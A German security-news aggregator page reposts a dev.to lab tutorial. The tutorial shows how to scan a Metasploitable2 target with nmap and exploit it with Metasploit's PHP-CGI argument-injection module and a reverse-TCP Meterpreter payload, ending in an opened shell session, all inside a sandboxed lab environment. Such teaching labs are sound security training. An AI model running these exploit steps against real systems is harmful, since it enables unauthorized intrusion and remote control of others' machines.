🔧 AI Nachrichten Major AI platforms go down in unprecedented simultaneous outage(03.09.2026 um 17:34 Uhr)
🔧 AI Nachrichten ChatGPT, Claude, and Grok Down? Users Report Widespread Outages(03.09.2026 um 19:14 Uhr)
🔧 AI Nachrichten OpenAI Launches GPT-6 Astra, Says We May Have Entered the AGI Era(03.09.2026 um 22:08 Uhr)
🔧 AI Nachrichten Claude Comes to CarPlay as Fifth Major AI Chatbot App(05.09.2026 um 05:31 Uhr)
🔧 AI Nachrichten OpenAI’s GPT-6 Astra Is AGI, Says NVIDIA CEO Jensen Huang(07.09.2026 um 06:31 Uhr)
🔧 AI Nachrichten Blame AI companies for Mac mini and Mac Studio shortage(31.08.2026 um 10:32 Uhr)
🔧 AI Nachrichten Major AI platforms go down in unprecedented simultaneous outage(03.09.2026 um 17:34 Uhr)
🔧 AI Nachrichten ChatGPT, Claude, and Grok Down? Users Report Widespread Outages(03.09.2026 um 19:14 Uhr)
🔧 AI Nachrichten OpenAI Launches GPT-6 Astra, Says We May Have Entered the AGI Era(03.09.2026 um 22:08 Uhr)
🔧 AI Nachrichten Claude Comes to CarPlay as Fifth Major AI Chatbot App(05.09.2026 um 05:31 Uhr)
🔧 AI Nachrichten OpenAI’s GPT-6 Astra Is AGI, Says NVIDIA CEO Jensen Huang(07.09.2026 um 06:31 Uhr)
🔧 AI Nachrichten Blame AI companies for Mac mini and Mac Studio shortage(31.08.2026 um 10:32 Uhr)

🔧 Programmierung 🕛 kürzlich 5 Min Lesezeit SECURITY-FEED
0

Vulnerability Scanning | Penetration Testing | Kali Linux | Metasploitable2 | Hands-on Lab

↗ Quelle (dev.to)
🔬 IoC Intelligence (2 Indikatoren erkannt)
192[.]168[.]122[.]102192[.]168[.]122[.]1
🗣️ Stimme:
📑 Inhaltsübersicht




Introduction



, you will learn how to perform vulnerability scanning and penetration testing on a target machine using various tools in Kali Linux. The goal is to gain practical experience with popular vulnerability scanning tools and understand how to leverage the findings to conduct successful penetration attacks. The lab will be conducted on the LabEx platform, where you will be provided with a Kali Linux container as the attacking machine and a Metasploitable2 virtual machine as the target.






Setting up the Environment



In this step, you will start the Kali Linux container and the Metasploitable2 target machine on the LabEx platform.




  1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:




CODE
sudo virsh start Metasploitable2







  1. Test the connectivity to the target machine by pinging it:




CODE
ping 192.168.122.102






Press Ctrl+C to stop the ping.




  1. Launch the Kali Linux container and enter the bash environment by running:




CODE
docker run -ti --network host b5b709a49cd5 bash







  1. Inside the Kali container, test the network connection to the target machine:




CODE
ping 192.168.122.102






Press Ctrl+C to stop the ping.






Performing Vulnerability Scanning with Nmap



In this step, you will learn about some popular vulnerability scanning tools available in Kali Linux.




  1. X-scan: X-scan is a well-known comprehensive scanning tool in China. It is completely free, does not require installation, and supports both graphical and command-line interfaces in Chinese and English. X-scan is developed by a renowned Chinese hacker group called "Security Focus" and has been constantly improved since its internal testing version 0.2 in 2000.


  2. Nessus: Nessus is one of the most widely used vulnerability scanning and analysis software in the world. Over 75,000 organizations use Nessus to scan their computer systems. Nessus was created by Renaud Deraison in 1998 with the goal of providing a free, powerful, frequently updated, and easy-to-use remote system security scanning program for the internet community.


  3. SQLmap: SQLmap is an automatic SQL injection tool that can scan, detect, and exploit SQL injection vulnerabilities in a given URL. It currently supports MS-SQL, MySQL, Oracle, and PostgreSQL databases. SQLmap employs four unique SQL injection techniques: blind inference, UNION queries, stacked queries, and time-based blind injection.


  4. Nmap: Nmap is a powerful and versatile network exploration and security auditing tool. It can be used for various purposes, including network discovery, port scanning, and vulnerability detection.




Now, you will use Nmap to perform a vulnerability scan on the Metasploitable2 target machine.




  1. Start the Metasploit database service and initialize the database:




CODE
cd ~
service postgresql start
msfdb init







  1. Launch the Metasploit console:




CODE
msfconsole







  1. Within the Metasploit console, use the nmap command to scan the target machine:




CODE
nmap -sS -T4 192.168.122.102






Here's an example of the output you might see:




CODE
[*] exec: nmap -sS -T4 192.168.122.102

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-23 23:15 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0032s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 52:54:00:1E:9E:B4 (QEMU virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds






The -sS parameter performs a TCP SYN scan (also known as a half-open or stealth scan), and -T4 sets the timing policy to be aggressive but not too fast to avoid excessive network traffic.




  1. Observe the output of the scan, which should display the open ports and services on the target machine.



Press Ctrl+D to quit the Metasploit console then start the inspection






Exploiting a Vulnerability



In this step, you will use the information gathered from the Nmap scan to exploit a vulnerability on the Metasploitable2 target machine.




  1. First of all, if you are not in the Metasploit console, you should start the Metasploit console:




CODE
cd ~
msfconsole







  1. From the Nmap scan results, identify an open port on the target machine, for example, port 80. In the Metasploit console, search for an exploit module related to the open port:




CODE
search http







  1. Use the appropriate exploit module:




CODE
use exploit/multi/http/php_cgi_arg_injection







  1. Set the target machine's IP address:




CODE
set RHOST 192.168.122.102







  1. Set the payload to use:




CODE
set PAYLOAD php/meterpreter/reverse_tcp







  1. Set the local machine's IP address:




CODE
set LHOST 192.168.122.1







  1. Run the exploit:




CODE
exploit






Here's an example of the output you might see:




CODE
[*] Started reverse TCP handler on 192.168.122.1:4444 
[*] Sending stage (39927 bytes) to 192.168.122.102
[*] Meterpreter session 1 opened (192.168.122.1:4444 -> 192.168.122.102:38510) at 2024-03-23 23:21:14 +0000







  1. If the exploit is successful, you should gain access to the target machine's shell. Verify the access by running commands like sysinfo to display system information.


  2. If you have time, you can try exploring other vulnerability scanning tools like Nessus, SQLmap, or X-scan. You can also attempt to exploit different vulnerabilities on the Metasploitable2 target machine.




Press Ctrl+D to quit the Metasploit console then start the inspection






Summary



In










Want to Learn More?




  • 🌳 Learn the latest

  • 💬 Join our

Vollständiger Original-Bericht
Ausführliche Details, Code-Beispiele & Hersteller-Stellungnahme auf dev.to.
↗ Original-Artikel auf dev.to lesen
Wie bewertest du diesen Beitrag?
1 Klick Feedback
Teilen mit Netzwerk & Team:
Community Threat-Level Barometer
Live Votum

Wie stufst du das Risiko dieser Schwachstelle / Bedrohung für dein Unternehmen ein?

Noch keine Stimmen — schätze das Risiko als Erster ein.

Community-Analysen & Experten-Meinungen 0

Verfasse deine eigene Analyse, teile Workarounds oder diskutiere diesen Vorfall im Blog.
Noch keine Community-Analyse verfasst. Markiere einen Textabschnitt oder klicke oben auf Eigene Analyse verfassen“!
Community Pulse: Relevanz-Einschätzung
1 Klick Experten-Votum
🔴 Akute Relevanz 0%
🟡 In Evaluierung 0%
🟢 Keine Auswirkung 0%
Spannende Innovation 0%
Verwandte Story-Cluster & Quellen (Vektor-KI)
Port 8095 Engine
3 Quellen
GPT-6 Astra Release Today? OpenAI’s Next Major AI Model Is Almost Here
1 Quelle
Apple accuses OpenAI of destroying evidence as trade-secrets fight intensifies
1 Quelle
Major AI platforms go down in unprecedented simultaneous outage
Ähnliche Beiträge
🔍 Verwandte News

Auch interessante Nachrichten Vulnerability Scanning | Penetration Testing | Kali Linux | Metasploitable2 | Hands-on Lab

Thematisch verwandte Begriffe: Vulnerability, Scanning, Penetration, Testing · 6 Treffer

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...